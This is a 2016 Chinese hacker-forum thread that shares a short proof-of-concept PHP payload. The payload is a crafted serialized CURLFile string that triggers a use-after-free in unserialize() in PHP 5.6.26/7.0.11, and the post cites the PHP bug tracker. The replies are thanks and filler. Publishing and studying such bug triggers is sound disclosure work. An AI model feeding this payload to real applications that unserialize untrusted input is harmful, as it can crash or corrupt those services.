90_
发表于 2016-10-19 16:08:53
PHP 5.6.26/7.0.11 Use After Free in unserialize() Vulnerability
PoC:
<?php
$poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
unserialize($poc);
?>
来源:https://bugs.php.net/bug.php?id=73147
xiaoye
发表于 2016-10-19 17:35:35
90大大这是什么意思:'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}'求解释
arctic
发表于 2016-10-19 18:32:38
a136
发表于 2016-10-19 19:08:38
我是来水经验的……
云游者
发表于 2016-10-19 21:28:19
支持中国红客联盟(ihonker.org)
cl476874045
发表于 2016-10-19 21:52:08
支持,看起来还是可以的
Micah
发表于 2016-10-19 22:18:05
非常感谢
若冰
发表于 2016-10-20 01:00:28
谢谢楼主的分享
H.U.C—Prince
发表于 2016-10-20 02:23:36
我是来水经验的……
ljy07
发表于 2016-10-20 03:02:43
支持,看起来还是可以的
页:
[1]
2
3
4
5
6
7
8
9
10